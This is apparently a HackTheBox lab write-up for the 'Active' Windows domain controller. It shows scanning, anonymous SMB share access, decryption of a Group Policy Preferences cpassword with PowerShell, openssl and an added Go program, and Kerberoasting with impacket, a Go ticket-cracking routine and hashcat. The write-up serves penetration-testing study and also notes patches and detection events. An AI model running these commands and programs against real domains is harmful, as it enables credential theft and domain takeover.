Active
Port scan
root@kali:~/HTB/Machines/Active# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.100 --rate=1000

Starting masscan 1.0.5 at 2019-12-03 19:49:39 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 61581/udp on 10.10.10.100
Discovered open port 389/tcp on 10.10.10.100
Discovered open port 139/tcp on 10.10.10.100
Discovered open port 9389/tcp on 10.10.10.100
Discovered open port 49154/tcp on 10.10.10.100
Discovered open port 61157/udp on 10.10.10.100
Discovered open port 49158/tcp on 10.10.10.100
Discovered open port 53/udp on 10.10.10.100
Discovered open port 3269/tcp on 10.10.10.100
Discovered open port 49169/tcp on 10.10.10.100
Discovered open port 445/tcp on 10.10.10.100
Discovered open port 5722/tcp on 10.10.10.100
Discovered open port 49155/tcp on 10.10.10.100
Discovered open port 3268/tcp on 10.10.10.100
Discovered open port 464/tcp on 10.10.10.100
Discovered open port 49157/tcp on 10.10.10.100
Discovered open port 135/tcp on 10.10.10.100
Discovered open port 47001/tcp on 10.10.10.100
Discovered open port 60900/udp on 10.10.10.100
Discovered open port 88/tcp on 10.10.10.100
Discovered open port 49171/tcp on 10.10.10.100
Discovered open port 636/tcp on 10.10.10.100
Discovered open port 53/tcp on 10.10.10.100
Discovered open port 49182/tcp on 10.10.10.100
Discovered open port 49152/tcp on 10.10.10.100
Discovered open port 593/tcp on 10.10.10.100
Discovered open port 60785/udp on 10.10.10.100
Discovered open port 49153/tcp on 10.10.10.100
root@kali:~/HTB/Machines/Active# nmap -sC -sV 10.10.10.100
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-03 14:50 EST
Nmap scan report for active.htb (10.10.10.100)
Host is up (0.043s latency).
Not shown: 983 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2019-12-03 19:50:54Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  tcpwrapped
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2019-12-03T19:51:49
|_  start_date: 2019-12-03T19:14:25

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 190.91 seconds

DNS, Kerberos (88), LDAP and the global catalog (3268/3269), SMB and the hostname DC make this a Windows Server 2008 R2 domain controller for active.htb. SMB signing is enabled and required, so SMB relay is not an option here; the interesting surface is what SMB and Kerberos expose to anonymous and low-privileged users.
Active directory enumeration
Simple smbclient anonymous enumeration
root@kali:~/HTB/Machines/Active# smbclient -L //10.10.10.100
Enter WORKGROUP\root's password:
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	Replication     Disk
	SYSVOL          Disk      Logon server share
	Users           Disk
SMB1 disabled -- no workgroup available
Nullinux setup
root@kali:~/HTB/Utils# git clone https://github.com/m8r0wn/nullinux
Cloning into 'nullinux'...
remote: Enumerating objects: 63, done.
remote: Counting objects: 100% (63/63), done.
remote: Compressing objects: 100% (51/51), done.
remote: Total 383 (delta 27), reused 16 (delta 6), pack-reused 320
Receiving objects: 100% (383/383), 89.01 KiB | 1.20 MiB/s, done.
Resolving deltas: 100% (205/205), done.
root@kali:~/HTB/Utils# cd nullinux/
root@kali:~/HTB/Utils/nullinux# ./setup.sh

[*] Starting nullinux setup script
Collecting ipparser (from -r requirements.txt (line 1))
  Downloading https://files.pythonhosted.org/packages/d3/9d/aeaa797f7278c6dca39b6878a252b03e70cd09a2b956f56bfdcc186cc9ba/ipparser-0.3.5.tar.gz
Requirement already satisfied: dnspython in /usr/lib/python3/dist-packages (from ipparser->-r requirements.txt (line 1)) (1.16.0)
Building wheels for collected packages: ipparser
  Running setup.py bdist_wheel for ipparser ... done
  Stored in directory: /root/.cache/pip/wheels/02/2c/c5/ab538902253acfd931309bbcb10ab441e6b67a0e944802b206
Successfully built ipparser
Installing collected packages: ipparser
Successfully installed ipparser-0.3.5
[*] Checking for smbclient
[+] smbclient installed

[*] nullinux setup complete
Nullinux enumeration
root@kali:~/HTB/Machines/Active# python3 ../../Utils/nullinux/nullinux.py -v 10.10.10.100
Starting nullinux v5.4.1 | 01-05-2020 14:08
[*] Enumerating Shares for: 10.10.10.100
    Shares                                   Comments
   -------------------------------------------
    \\10.10.10.100\ADMIN$                    Remote Admin
    \\10.10.10.100\C$                        Default share
    \\10.10.10.100\IPC$
    \\10.10.10.100\NETLOGON                  Logon server share
    \\10.10.10.100\Replication
    \\10.10.10.100\SYSVOL                    Logon server share
    \\10.10.10.100\Users

[*] Enumerating: \\10.10.10.100\ADMIN$
    [-] tree connect failed: NT_STATUS_ACCESS_DENIED

[*] Enumerating: \\10.10.10.100\C$
    [-] tree connect failed: NT_STATUS_ACCESS_DENIED

[*] Enumerating: \\10.10.10.100\IPC$
    [-] NT_STATUS_ACCESS_DENIED listing \*

[*] Enumerating: \\10.10.10.100\NETLOGON
    [-] tree connect failed: NT_STATUS_ACCESS_DENIED

[*] Enumerating: \\10.10.10.100\Replication
    .                                   D        0  Sat Jul 21 06:37:44 2018
    ..                                  D        0  Sat Jul 21 06:37:44 2018
    active.htb                          D        0  Sat Jul 21 06:37:44 2018

[*] Enumerating: \\10.10.10.100\SYSVOL
    [-] tree connect failed: NT_STATUS_ACCESS_DENIED

[*] Enumerating: \\10.10.10.100\Users
    [-] tree connect failed: NT_STATUS_ACCESS_DENIED

[*] Enumerating Domain Information for: 10.10.10.100
    [-] Could not attain Domain SID

[*] Enumerating querydispinfo for: 10.10.10.100

[*] Enumerating enumdomusers for: 10.10.10.100

[*] Enumerating LSA for: 10.10.10.100

[*] Performing RID Cycling for: 10.10.10.100
    [-] RID Failed: Could not attain Domain SID

[*] Testing 10.10.10.100 for Known Users

[*] Enumerating Group Memberships for: 10.10.10.100

[*] 0 unique user(s) identified

Anonymous access gets nothing from the RPC side (no domain SID, so no RID cycling and no user list), but the non-default Replication share is readable without credentials. Its active.htb directory is worth pulling in full.
root@kali:~/HTB/Machines/Active/smbclient/Replication# smbclient \\\\10.10.10.100\\Replication
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  active.htb                          D        0  Sat Jul 21 06:37:44 2018

		10459647 blocks of size 4096. 4931606 blocks available
smb: \> cd active.htb
smb: \active.htb\> dir
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  DfsrPrivate                       DHS        0  Sat Jul 21 06:37:44 2018
  Policies                            D        0  Sat Jul 21 06:37:44 2018
  scripts                             D        0  Wed Jul 18 14:48:57 2018

		10459647 blocks of size 4096. 4931606 blocks available
smb: \active.htb\> prompt
smb: \active.htb\> recurse
smb: \active.htb\> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as GPE.INI (0.7 KiloBytes/sec) (average 0.4 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as GptTmpl.inf (6.1 KiloBytes/sec) (average 2.3 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (2.9 KiloBytes/sec) (average 2.4 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as Registry.pol (15.3 KiloBytes/sec) (average 5.0 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as GPT.INI (0.1 KiloBytes/sec) (average 4.2 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as GptTmpl.inf (20.4 KiloBytes/sec) (average 6.5 KiloBytes/sec)
Groups.xml file
root@kali:~/HTB/Machines/Active/smbclient/Replication# find -type f
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI
./Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
./Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI
The directory layout (Policies, DfsrPrivate, scripts) is a copy of the SYSVOL policy tree, and the interesting file in it is Groups.xml under MACHINE\Preferences\Groups. It is a Group Policy Preferences item that creates or updates the account active.htb\SVC_TGS, and its cpassword attribute carries that account's password.
root@kali:~/HTB/Machines/Active/smbclient/Replication# cat "./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml"
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
    <Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
  </User>
</Groups>
cpassword from Groups.xml
Microsoft's Open Specifications (MS-GPPREF, section 2.2.1.1.4 "Password Encryption") document that Group Policy Preferences store account passwords in the cpassword attribute encrypted with AES-256 in CBC mode under a fixed 32-byte key, and the key itself is printed in the specification. The encryption therefore protects nothing: anyone who can read the policy files (every domain user can read SYSVOL, and here the Replication share is readable anonymously) can recover the plaintext. Microsoft removed the ability to set passwords through GPP in 2014 (MS14-025, KB2962486), but the patch does not delete existing Groups.xml files, so old preference items like this one keep leaking credentials.
root@kali:~/HTB/Utils# git clone https://github.com/PowerShellMafia/PowerSploit
root@kali:~/HTB/Utils# cd PowerSploit/Exfiltration
root@kali:~/HTB/Utils/PowerSploit/Exfiltration# view Get-GPPPassword.ps1
Powershell script
Inspired by that script, the following routine decrypts the cpassword from Groups.xml: it restores the Base64 padding that GPP drops, decrypts with the MS-GPPREF key and a zero IV, and decodes the UTF-16LE plaintext.
root@kali:~/HTB/Machines/Active# cat Get-DecryptedCpassword.ps1
function Get-DecryptedCpassword {
    Param (
        [string] $Cpassword
    )

    try {
        # GPP stores the Base64 without '=' padding; append what FromBase64String needs
        $Mod = ($Cpassword.length % 4)

        switch ($Mod) {
            '1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)}
            '2' {$Cpassword += ('=' * (4 - $Mod))}
            '3' {$Cpassword += ('=' * (4 - $Mod))}
        }

        $Base64Decoded = [Convert]::FromBase64String($Cpassword)

        # Create a new AES .NET Crypto Object; the key is the one published in MS-GPPREF 2.2.1.1.4
        $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
        [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                             0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)

        # Set IV to all nulls to prevent dynamic generation of IV value
        $AesIV = New-Object Byte[]($AesObject.IV.Length)
        $AesObject.IV = $AesIV
        $AesObject.Key = $AesKey
        $DecryptorObject = $AesObject.CreateDecryptor()
        [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)

        # The decrypted bytes are UTF-16LE
        return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
    }
    catch {Write-Error $Error[0]}
}

Get-DecryptedCpassword 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
The execution of the routine provides the password of the service user.
root@kali:~/HTB/Machines/Active# pwsh
PowerShell 6.2.3
Copyright (c) Microsoft Corporation. All rights reserved.

https://aka.ms/pscore6-docs
Type 'help' to get help.

PS /root/HTB/Machines/Active> . ./Get-DecryptedCpassword.ps1
GPPstillStandingStrong2k18
PS /root/HTB/Machines/Active> exit
Alternative way with gpp-decrypt
Another way to decrypt the password is the gpp-decrypt command.
root@kali:~/HTB/Machines/Active# gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
/usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated
GPPstillStandingStrong2k18
gpp-decrypt is a small Ruby script shipped with Kali; the deprecation warning comes from the OpenSSL Ruby binding and is harmless.
Alternative way manually with openssl
The cpassword is Base64, but GPP stores it without the trailing "=" padding, so a strict decoder rejects it. The string is 86 characters long and 86 mod 4 = 2, so two "=" are needed (a remainder of 3 would need one "=", and a remainder of 1 is never valid Base64).
root@kali:~/HTB/Machines/Active# echo "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" | base64 -d 1>/dev/null
base64: invalid input
root@kali:~/HTB/Machines/Active# echo "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ=" | base64 -d 1>/dev/null
base64: invalid input
root@kali:~/HTB/Machines/Active# echo "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ==" | base64 -d 1>/dev/null
The decoded bytes are then decrypted with openssl using Microsoft's key (AES-256-CBC) and an all-zero IV. "-iv 0" is shorter than the 16 bytes openssl expects, which is why it warns and pads the IV with zero bytes; passing 32 zero hex digits gives the same result without the warning. Note that the plaintext is UTF-16LE, so every character is followed by a NUL byte: the terminal hides them, but if the output is redirected into a file or another tool, convert it first with iconv -f UTF-16LE -t UTF-8.
root@kali:~/HTB/Machines/Active# echo "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ==" | base64 -d | openssl aes-256-cbc -d -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0
hex string is too short, padding with zero bytes to length
GPPstillStandingStrong2k18
The separate base64 step can be folded into openssl with the -a option.
root@kali:~/HTB/Machines/Active# echo "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ==" | openssl aes-256-cbc -d -a -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0
hex string is too short, padding with zero bytes to length
GPPstillStandingStrong2k18
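The three decryptions above (PowerShell, gpp-decrypt, openssl) all perform the same steps, and each leaves one of them implicit: the padding rule, the zero IV, the PKCS#7 unpadding, or the UTF-16LE decoding. The Go program below is an added example, not code from this writeup, PowerSploit or Kali, that does the whole procedure in one place with each step checked. The function name DecryptCpassword is my own choice; the cpassword is the one from Groups.xml above, and the key is the MS-GPPREF one used throughout this section.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"encoding/hex"
	"errors"
	"fmt"
	"strings"
	"unicode/utf16"
)

// AES-256 key published in MS-GPPREF section 2.2.1.1.4 ("Password Encryption").
// It is the same in every domain, which is the whole weakness.
const gppKeyHex = "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"

// DecryptCpassword (name chosen for this example) recovers the plaintext behind a
// cpassword attribute from Groups.xml or any other GPP XML file.
func DecryptCpassword(cpassword string) (string, error) {
	// GPP writes the Base64 without '=' padding; strip whatever padding a copy may
	// have added and use the raw decoder, which works out the length itself.
	ct, err := base64.RawStdEncoding.DecodeString(strings.TrimRight(cpassword, "="))
	if err != nil {
		return "", fmt.Errorf("cpassword is not valid base64: %w", err)
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", errors.New("ciphertext length is not a multiple of the AES block size")
	}
	key, _ := hex.DecodeString(gppKeyHex)
	block, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	// MS-GPPREF: AES-256-CBC with an all-zero 16-byte IV (what "-iv 0" means above).
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, make([]byte, aes.BlockSize)).CryptBlocks(pt, ct)
	// Remove PKCS#7 padding; a bad pad almost always means the value was not GPP-encrypted.
	pad := int(pt[len(pt)-1])
	if pad < 1 || pad > aes.BlockSize {
		return "", errors.New("bad PKCS#7 padding")
	}
	for _, b := range pt[len(pt)-pad:] {
		if int(b) != pad {
			return "", errors.New("bad PKCS#7 padding")
		}
	}
	pt = pt[:len(pt)-pad]
	// The plaintext is UTF-16LE: that is the NUL after every character openssl prints.
	if len(pt)%2 != 0 {
		return "", errors.New("plaintext is not UTF-16LE")
	}
	u := make([]uint16, len(pt)/2)
	for i := range u {
		u[i] = uint16(pt[2*i]) | uint16(pt[2*i+1])<<8
	}
	return string(utf16.Decode(u)), nil
}

func main() {
	// cpassword copied from the Groups.xml found on the Replication share.
	pw, err := DecryptCpassword("edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ")
	if err != nil {
		panic(err)
	}
	fmt.Println("SVC_TGS:", pw)
}
```

Because the function validates the padding and the UTF-16 length, it can be run over every cpassword found in a SYSVOL dump (Groups.xml, Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml all use the same attribute) and will reject values that were not produced by GPP instead of printing garbage.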
User Flag
root@kali:~/HTB/Machines/Active# smbclient \\\\10.10.10.100\\Users -U SVC_TGS
Enter WORKGROUP\SVC_TGS's password:
Try "help" to get a list of possible commands.
smb: \> get SVC_TGS\Desktop\user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as SVC_TGS\Desktop\user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> exit
root@kali:~/HTB/Machines/Active# cat SVC_TGS\\Desktop\\user.txt
<USER_FLAG>
Kerberoasting
Kerberoasting takes advantage of how service accounts use Kerberos with Service Principal Names (SPNs). Any authenticated domain user can ask the KDC for a service ticket (TGS) for any registered SPN, and the KDC answers with a ticket whose encrypted part is protected with the long-term key of the account that owns the SPN. For encryption type 23 (RC4-HMAC), the default for user accounts on this 2008 R2 domain, that key is simply the NT hash of the account's password, so each wordlist candidate can be hashed and tested against the ticket offline. Because the guessing happens offline, it causes no account lockouts; it is not invisible, though: every request is logged on the DC as event 4769, and a ticket with encryption type 0x17 (RC4) requested for a user account rather than a computer account is the usual detection. Once cracked, you have the service account password in plain text.
Install impacket tools
root@kali:~/HTB/Utils# git clone https://github.com/SecureAuthCorp/impacket.git
Cloning into 'impacket'...
remote: Enumerating objects: 29, done.
remote: Counting objects: 100% (29/29), done.
remote: Compressing objects: 100% (24/24), done.
remote: Total 17215 (delta 9), reused 13 (delta 5), pack-reused 17186
Receiving objects: 100% (17215/17215), 5.71 MiB | 18.16 MiB/s, done.
Resolving deltas: 100% (13131/13131), done.
root@kali:~/HTB/Utils# cd impacket/
root@kali:~/HTB/Utils/impacket# python setup.py install
Retrieve SPN tickets
root@kali:~/HTB/Machines/Active# ../../Utils/impacket/examples/GetUserSPNs.py -request active.htb/SVC_TGS -outputfile SPN2hashcat
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2018-07-30 13:17:40.656520
The only SPN in the domain (active/CIFS:445) is registered on the built-in Administrator account, so cracking this one ticket gives domain admin directly. The tool has retrieved the ticket in hashcat format (the ticket bytes are shortened below).
root@kali:~/HTB/Machines/Active# cat SPN2hashcat $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$66be5612a75e8b848bee009cc6f1cd3d$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
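What hashcat does with that line, as an added Go example (not code from this writeup, impacket or hashcat): the NT hash is MD4 over the UTF-16LE password (MD4 is implemented inline because Go's standard library does not ship it), RFC 4757 derives K1 = HMAC-MD5(NT, key usage 2), K3 = HMAC-MD5(K1, checksum), RC4-decrypts the edata with K3 and accepts the guess if HMAC-MD5(K1, plaintext) equals the stored checksum. Since the ticket bytes on this page are truncated, the example first encrypts a constructed dummy EncTicketPart under the NT hash of a chosen password, builds the same $krb5tgs$23$ line GetUserSPNs.py writes, and then checks guesses against it. The function names, the fixed confounder and the dummy plaintext are assumptions of this example.

```go
package main

import (
	"crypto/hmac"
	"crypto/md5"
	"crypto/rc4"
	"encoding/binary"
	"encoding/hex"
	"fmt"
	"math/bits"
	"strings"
	"unicode/utf16"
)

// md4Sum is RFC 1320 MD4; Go's standard library has no MD4 and the NT hash needs it.
func md4Sum(msg []byte) [16]byte {
	type round struct {
		fn  func(x, y, z uint32) uint32
		k   uint32
		idx [16]int // message word order
		s   [4]int  // rotation amounts
	}
	rounds := [3]round{
		{func(x, y, z uint32) uint32 { return x&y | ^x&z }, 0, [16]int{0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15}, [4]int{3, 7, 11, 19}},
		{func(x, y, z uint32) uint32 { return x&y | x&z | y&z }, 0x5a827999, [16]int{0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15}, [4]int{3, 5, 9, 13}},
		{func(x, y, z uint32) uint32 { return x ^ y ^ z }, 0x6ed9eba1, [16]int{0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15}, [4]int{3, 9, 11, 15}},
	}
	m := append(append([]byte{}, msg...), 0x80) // padding: 0x80, zeros to 56 mod 64, 64-bit LE bit length
	for len(m)%64 != 56 {
		m = append(m, 0)
	}
	var l [8]byte
	binary.LittleEndian.PutUint64(l[:], uint64(len(msg))*8)
	m = append(m, l[:]...)
	st := [4]uint32{0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476}
	for off := 0; off < len(m); off += 64 {
		a, b, c, d := st[0], st[1], st[2], st[3]
		for _, r := range rounds {
			for j := 0; j < 16; j++ {
				w := binary.LittleEndian.Uint32(m[off+4*r.idx[j]:])
				a = bits.RotateLeft32(a+r.fn(b, c, d)+w+r.k, r.s[j%4])
				a, b, c, d = d, a, b, c // rotate registers for the next step
			}
		}
		st[0], st[1], st[2], st[3] = st[0]+a, st[1]+b, st[2]+c, st[3]+d
	}
	var out [16]byte
	for i, v := range st {
		binary.LittleEndian.PutUint32(out[4*i:], v)
	}
	return out
}

// ntHash is MD4 over the UTF-16LE password: the etype 23 (RC4-HMAC) long-term key.
func ntHash(password string) []byte {
	u := utf16.Encode([]rune(password))
	buf := make([]byte, 2*len(u))
	for i, c := range u {
		binary.LittleEndian.PutUint16(buf[2*i:], c)
	}
	sum := md4Sum(buf)
	return sum[:]
}

func hmacMD5(key, data []byte) []byte {
	h := hmac.New(md5.New, key)
	h.Write(data)
	return h.Sum(nil)
}

// Key usage 2 (EncTicketPart of a TGS-REP, the blob GetUserSPNs.py writes out) as 4-byte LE.
var tgsTicketUsage = []byte{2, 0, 0, 0}

// rc4HmacEncrypt follows RFC 4757 section 6 with K2 == K1 (etype 23) and returns the
// HMAC-MD5 checksum and the RC4 ciphertext: the two hex fields of a $krb5tgs$23$ line.
// confounder must be 8 bytes (random in real Kerberos; fixed here for reproducibility).
func rc4HmacEncrypt(nt, confounder, plaintext []byte) (checksum, edata []byte) {
	k1 := hmacMD5(nt, tgsTicketUsage)
	data := append(append([]byte{}, confounder...), plaintext...)
	checksum = hmacMD5(k1, data)
	k3 := hmacMD5(k1, checksum)
	c, _ := rc4.NewCipher(k3)
	edata = make([]byte, len(data))
	c.XORKeyStream(edata, data)
	return checksum, edata
}

// hashcatLine formats a ticket as GetUserSPNs.py -outputfile does for hashcat -m 13100.
func hashcatLine(user, realm, spn string, checksum, edata []byte) string {
	return fmt.Sprintf("$krb5tgs$23$*%s$%s$%s*$%x$%x", user, realm, spn, checksum, edata)
}

// checkCandidate is one hashcat guess: derive K1 from the candidate's NT hash, recover K3
// from the stored checksum, RC4-decrypt, and compare HMAC-MD5(K1, plaintext) with the
// checksum. Everything happens offline; the DC is never contacted again.
func checkCandidate(line, candidate string) (bool, error) {
	const prefix = "$krb5tgs$23$*" // then "user$realm$spn*$checksum$edata"
	rest := strings.TrimPrefix(line, prefix)
	end := strings.Index(rest, "*$")
	if rest == line || end < 0 {
		return false, fmt.Errorf("not a $krb5tgs$23$ line: %q", line)
	}
	fields := strings.Split(rest[end+2:], "$")
	if len(fields) != 2 {
		return false, fmt.Errorf("expected checksum and edata fields")
	}
	checksum, err1 := hex.DecodeString(fields[0])
	edata, err2 := hex.DecodeString(fields[1])
	if err1 != nil || err2 != nil || len(checksum) != 16 || len(edata) <= 8 {
		return false, fmt.Errorf("malformed checksum or edata")
	}
	k1 := hmacMD5(ntHash(candidate), tgsTicketUsage)
	c, _ := rc4.NewCipher(hmacMD5(k1, checksum)) // K3
	pt := make([]byte, len(edata))
	c.XORKeyStream(pt, edata)
	return hmac.Equal(hmacMD5(k1, pt), checksum), nil
}

func main() {
	// Constructed ticket: a dummy EncTicketPart encrypted under the NT hash of a chosen password.
	secret := "Ticketmaster1968"
	sum, edata := rc4HmacEncrypt(ntHash(secret), []byte("confound"), []byte("constructed EncTicketPart"))
	line := hashcatLine("Administrator", "ACTIVE.HTB", "active/CIFS~445", sum, edata)
	for _, guess := range []string{"Password1", secret} {
		ok, _ := checkCandidate(line, guess)
		fmt.Printf("%-18s %v\n", guess, ok)
	}
}
```

The cost of one guess is two HMAC-MD5 operations plus an RC4 pass over the ticket, which is why a laptop CPU reaches almost a million candidates per second below. Tickets issued with AES (etypes 17/18) derive the key from the password with PBKDF2 at 4096 iterations, so the same wordlist is far slower against them; that is the reason to prefer RC4 when requesting, and the reason defenders watch for etype 0x17 in event 4769.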
Crack the ticket
root@kali:~/HTB/Machines/Active# hashcat -m 13100 SPN2hashcat --force /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i7-8550U CPU @ 1.80GHz, 2048/5878 MB allocatable, 8MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

